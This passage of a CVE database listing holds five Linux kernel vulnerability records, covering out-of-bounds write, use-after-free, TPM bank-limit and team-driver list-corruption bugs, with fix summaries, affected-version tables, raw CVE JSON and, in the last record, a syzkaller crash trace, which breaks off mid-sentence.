}
CVE-2025-71092 (GCVE-0-2025-71092)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()
Summary
In the Linux kernel, the following vulnerability has been resolved:

RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()

Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters
update") added three new counters and placed them after
BNXT_RE_OUT_OF_SEQ_ERR.

BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware
statistics with different num_counters values on chip_gen_p5_p7 devices.

As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating
hw_stats, which leads to an out-of-bounds write in
bnxt_re_copy_err_stats().

The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and
BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not
only p5/p7 devices.

Fix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they
are included in the generic counter set.

Severity
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/bnxt_re/hw_counters.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "369a161c48723f60f06f3510b82ea7d96d0499ab",
"status": "affected",
"version": "ef56081d1864582a6db50710733416c0510b7826",
"versionType": "git"
},
{
"lessThan": "9b68a1cc966bc947d00e4c0df7722d118125aa37",
"status": "affected",
"version": "ef56081d1864582a6db50710733416c0510b7826",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/bnxt_re/hw_counters.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()\n\nCommit ef56081d1864 (\"RDMA/bnxt_re: RoCE related hardware counters\nupdate\") added three new counters and placed them after\nBNXT_RE_OUT_OF_SEQ_ERR.\n\nBNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware\nstatistics with different num_counters values on chip_gen_p5_p7 devices.\n\nAs a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating\nhw_stats, which leads to an out-of-bounds write in\nbnxt_re_copy_err_stats().\n\nThe counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and\nBNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not\nonly p5/p7 devices.\n\nFix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they\nare included in the generic counter set."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:53.110Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/369a161c48723f60f06f3510b82ea7d96d0499ab"
},
{
"url": "https://git.kernel.org/stable/c/9b68a1cc966bc947d00e4c0df7722d118125aa37"
}
],
"title": "RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71092",
"datePublished": "2026-01-13T15:34:53.110Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:53.110Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68789 (GCVE-0-2025-68789)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
hwmon: (ibmpex) fix use-after-free in high/low store
Summary
In the Linux kernel, the following vulnerability has been resolved:

hwmon: (ibmpex) fix use-after-free in high/low store

The ibmpex_high_low_store() function retrieves driver data using
dev_get_drvdata() and uses it without validation. This creates a race
condition where the sysfs callback can be invoked after the data
structure is freed, leading to use-after-free.

Fix by adding a NULL check after dev_get_drvdata(), and reordering
operations in the deletion path to prevent TOCTOU.

Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 3ce9b7ae9d4d148672b35147aaf7987a4f82bb94 (git) |
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 533ead425f8109b02fecc7e72d612b8898ec347a (git) |
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < fa37adcf1d564ef58b9dfb01b6c36d35c5294bad (git) |
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 68d62e5bebbd118b763e8bb210d5cf2198ef450c (git) |
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 5aa2139201667c1f644601e4529c4acd6bf8db5a (git) |
| Linux | Linux | Affected: 57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab , < 6946c726c3f4c36f0f049e6f97e88c510b15f65d (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/ibmpex.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ce9b7ae9d4d148672b35147aaf7987a4f82bb94",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "533ead425f8109b02fecc7e72d612b8898ec347a",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "fa37adcf1d564ef58b9dfb01b6c36d35c5294bad",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "68d62e5bebbd118b763e8bb210d5cf2198ef450c",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "5aa2139201667c1f644601e4529c4acd6bf8db5a",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
},
{
"lessThan": "6946c726c3f4c36f0f049e6f97e88c510b15f65d",
"status": "affected",
"version": "57c7c3a0fdea95eddcaeba31e7ca7dfc917682ab",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/ibmpex.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.24"
},
{
"lessThan": "2.6.24",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (ibmpex) fix use-after-free in high/low store\n\nThe ibmpex_high_low_store() function retrieves driver data using\ndev_get_drvdata() and uses it without validation. This creates a race\ncondition where the sysfs callback can be invoked after the data\nstructure is freed, leading to use-after-free.\n\nFix by adding a NULL check after dev_get_drvdata(), and reordering\noperations in the deletion path to prevent TOCTOU."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:05.954Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ce9b7ae9d4d148672b35147aaf7987a4f82bb94"
},
{
"url": "https://git.kernel.org/stable/c/533ead425f8109b02fecc7e72d612b8898ec347a"
},
{
"url": "https://git.kernel.org/stable/c/fa37adcf1d564ef58b9dfb01b6c36d35c5294bad"
},
{
"url": "https://git.kernel.org/stable/c/68d62e5bebbd118b763e8bb210d5cf2198ef450c"
},
{
"url": "https://git.kernel.org/stable/c/5aa2139201667c1f644601e4529c4acd6bf8db5a"
},
{
"url": "https://git.kernel.org/stable/c/6946c726c3f4c36f0f049e6f97e88c510b15f65d"
}
],
"title": "hwmon: (ibmpex) fix use-after-free in high/low store",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68789",
"datePublished": "2026-01-13T15:29:02.079Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-19T12:19:05.954Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68817 (GCVE-0-2025-68817)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-02-06 16:31
Title
ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency
Summary
In the Linux kernel, the following vulnerability has been resolved:

ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency

Under high concurrency, a tree-connection object (tcon) is freed on
a disconnect path while another path still holds a reference and later
executes *_put()/write on it.

Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: dd45db4d9bbc8f122a9b4db5ce94ae29fcf03d3c , < 446beed646b2e426dd53d27358365f8678e1dd01 (git) |
| Linux | Linux | Affected: 7b58ee8d0b91359554cf219cd4f33872ea2afd66 , < d092de8a26c952379ded8e6b0bda31d89befac1a (git) |
| Linux | Linux | Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < d64977495e44855f2b28d8ce56107c963a7a50e4 (git) |
| Linux | Linux | Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < 21a3d01fc6db5129f81edb0ab7cb94fd758bcbea (git) |
| Linux | Linux | Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < 063cbbc6f595ea36ad146e1b7d2af820894beb21 (git) |
| Linux | Linux | Affected: 33b235a6e6ebe0f05f3586a71e8d281d00f71e2e , < b39a1833cc4a2755b02603eec3a71a85e9dff926 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/mgmt/tree_connect.c",
"fs/smb/server/mgmt/tree_connect.h",
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "446beed646b2e426dd53d27358365f8678e1dd01",
"status": "affected",
"version": "dd45db4d9bbc8f122a9b4db5ce94ae29fcf03d3c",
"versionType": "git"
},
{
"lessThan": "d092de8a26c952379ded8e6b0bda31d89befac1a",
"status": "affected",
"version": "7b58ee8d0b91359554cf219cd4f33872ea2afd66",
"versionType": "git"
},
{
"lessThan": "d64977495e44855f2b28d8ce56107c963a7a50e4",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "21a3d01fc6db5129f81edb0ab7cb94fd758bcbea",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "063cbbc6f595ea36ad146e1b7d2af820894beb21",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
},
{
"lessThan": "b39a1833cc4a2755b02603eec3a71a85e9dff926",
"status": "affected",
"version": "33b235a6e6ebe0f05f3586a71e8d281d00f71e2e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/mgmt/tree_connect.c",
"fs/smb/server/mgmt/tree_connect.h",
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.199",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.199",
"versionStartIncluding": "5.15.145",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.71",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency\n\nUnder high concurrency, A tree-connection object (tcon) is freed on\na disconnect path while another path still holds a reference and later\nexecutes *_put()/write on it."
}
],
"providerMetadata": {
"dateUpdated": "2026-02-06T16:31:37.271Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/446beed646b2e426dd53d27358365f8678e1dd01"
},
{
"url": "https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a"
},
{
"url": "https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4"
},
{
"url": "https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea"
},
{
"url": "https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21"
},
{
"url": "https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926"
}
],
"title": "ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68817",
"datePublished": "2026-01-13T15:29:21.210Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-02-06T16:31:37.271Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71077 (GCVE-0-2025-71077)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
tpm: Cap the number of PCR banks
Summary
In the Linux kernel, the following vulnerability has been resolved:

tpm: Cap the number of PCR banks

tpm2_get_pcr_allocation() does not cap any upper limit for the number of
banks. Cap the limit to eight banks so that out of bounds values coming
from external I/O cause only limited harm.

Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 8ceee7288152bc121a6bf92997261838c78bfe06 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 275c686f1e3cc056ec66c764489ec1fe1e51b950 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < ceb70d31da5671d298bad94ae6c20e4bbb800f96 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < d88481653d74d622d1d0d2c9bad845fc2cc6fd23 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < b69492161c056d36789aee42a87a33c18c8ed5e1 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < 858344bc9210bea9ab2bdc7e9e331ba84c164e50 (git) |
| Linux | Linux | Affected: bcfff8384f6c4e6627676ef07ccad9cfacd67849 , < faf07e611dfa464b201223a7253e9dc5ee0f3c9e (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm-chip.c",
"drivers/char/tpm/tpm1-cmd.c",
"drivers/char/tpm/tpm2-cmd.c",
"include/linux/tpm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8ceee7288152bc121a6bf92997261838c78bfe06",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "275c686f1e3cc056ec66c764489ec1fe1e51b950",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "ceb70d31da5671d298bad94ae6c20e4bbb800f96",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "d88481653d74d622d1d0d2c9bad845fc2cc6fd23",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "b69492161c056d36789aee42a87a33c18c8ed5e1",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "858344bc9210bea9ab2bdc7e9e331ba84c164e50",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
},
{
"lessThan": "faf07e611dfa464b201223a7253e9dc5ee0f3c9e",
"status": "affected",
"version": "bcfff8384f6c4e6627676ef07ccad9cfacd67849",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm-chip.c",
"drivers/char/tpm/tpm1-cmd.c",
"drivers/char/tpm/tpm2-cmd.c",
"include/linux/tpm.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:38.319Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8ceee7288152bc121a6bf92997261838c78bfe06"
},
{
"url": "https://git.kernel.org/stable/c/275c686f1e3cc056ec66c764489ec1fe1e51b950"
},
{
"url": "https://git.kernel.org/stable/c/ceb70d31da5671d298bad94ae6c20e4bbb800f96"
},
{
"url": "https://git.kernel.org/stable/c/d88481653d74d622d1d0d2c9bad845fc2cc6fd23"
},
{
"url": "https://git.kernel.org/stable/c/b69492161c056d36789aee42a87a33c18c8ed5e1"
},
{
"url": "https://git.kernel.org/stable/c/858344bc9210bea9ab2bdc7e9e331ba84c164e50"
},
{
"url": "https://git.kernel.org/stable/c/faf07e611dfa464b201223a7253e9dc5ee0f3c9e"
}
],
"title": "tpm: Cap the number of PCR banks",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71077",
"datePublished": "2026-01-13T15:31:29.435Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:38.319Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71091 (GCVE-0-2025-71091)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
team: fix check for port enabled in team_queue_override_port_prio_changed()
Summary
In the Linux kernel, the following vulnerability has been resolved:
team: fix check for port enabled in team_queue_override_port_prio_changed()
There has been a syzkaller bug reported recently with the following
trace:
list_del corruption, ffff888058bea080->prev is LIST_POISON2 (dead000000000122)
------------[ cut here ]------------
kernel BUG at lib/list_debug.c:59!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
CPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59
Code: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 <0f> 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff
RSP: 0018:ffffc9000d49f370 EFLAGS: 00010286
RAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000
RDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005
RBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000
R10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230
R13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480
FS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0
Call Trace:
<TASK>
__list_del_entry_valid include/linux/list.h:132 [inline]
__list_del_entry include/linux/list.h:223 [inline]
list_del_rcu include/linux/rculist.h:178 [inline]
__team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]
__team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]
team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]
team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534
team_option_set drivers/net/team/team_core.c:376 [inline]
team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653
genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115
genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]
genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210
netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552
genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219
netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346
netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896
sock_sendmsg_nosec net/socket.c:727 [inline]
__sock_sendmsg net/socket.c:742 [inline]
____sys_sendmsg+0xa98/0xc70 net/socket.c:2630
___sys_sendmsg+0x134/0x1d0 net/socket.c:2684
__sys_sendmsg+0x16d/0x220 net/socket.c:2716
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
The problem is in this flow:
1) Port is enabled, queue_id != 0, in qom_list
2) Port gets disabled
   -> team_port_disable()
   -> team_queue_override_port_del()
   -> del (removed from list)
3) Port is disabled, queue_id != 0, not in any list
4) Priority changes
   -> team_queue_override_port_prio_changed()
   -> checks: port disabled && queue_id != 0
   -> calls del - hits the BUG as it is removed already
To fix this, change the check in team_queue_override_port_prio_changed()
